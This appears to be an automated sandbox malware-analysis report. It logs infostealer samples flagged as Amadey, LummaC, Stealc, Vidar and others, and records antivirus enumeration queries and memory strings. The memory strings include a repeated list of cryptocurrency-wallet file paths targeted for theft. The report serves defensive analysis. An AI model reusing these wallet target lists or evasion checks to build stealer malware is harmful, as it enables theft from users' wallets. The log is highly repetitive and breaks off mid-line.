                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C53A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_6C53A8DC
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C488390 NSS_GetVersion,2_2_6C488390
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1785170775.0000000005C21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                      Stealing of Sensitive Information

                                      barindex
                                      Yara detected Amadey
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Yara detected Amadeys stealer DLL
                                      Source: Yara matchFile source: 14.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 13.2.GIIIIJDHJE.exe.780000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 44.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 73.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 58.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 6.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 43.2.483d2fa8a0d53818306efeb32d3.exe.5f0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 7.2.skotes.exe.fa0000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000003A.00000002.2789901199.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000002C.00000002.2780754932.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000005.00000002.1998815042.0000000000481000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 0000000D.00000002.2287015642.0000000000781000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000006.00000002.2049080797.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000007.00000002.2048763354.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                      Yara detected LiteHTTP Bot
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED
                                      Yara detected LummaC Stealer
                                      Source: Yara matchFile source: Process Memory Space: 5EfYBe3nch.exe PID: 7268, type: MEMORYSTR
                                      Yara detected Poverty Stealer
                                      Source: Yara matchFile source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: iSHmPkn.exe PID: 7540, type: MEMORYSTR
                                      Yara detected Stealc
                                      Source: Yara matchFile source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE
                                      Source: Yara matchFile source: 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                      Source: Yara matchFile source: 00000002.00000002.2273078519.0000000000731000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
                                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                      Yara detected Vidar stealer
                                      Source: Yara matchFile source: Process Memory Space: DLTDCR8UJINP8YM8Y.exe PID: 7656, type: MEMORYSTR
                                      Found many strings related to Crypto-Wallets (likely being stolen)
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 1520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":2097
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wa
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: re"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"]_
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsone-N
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\simple-storage.json_
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1726694915.00000000014B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: re"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"]_
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                                      Source: 5EfYBe3nch.exe, 00000000.00000003.1774596818.00000000014B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco*
                                      Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007FC000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session 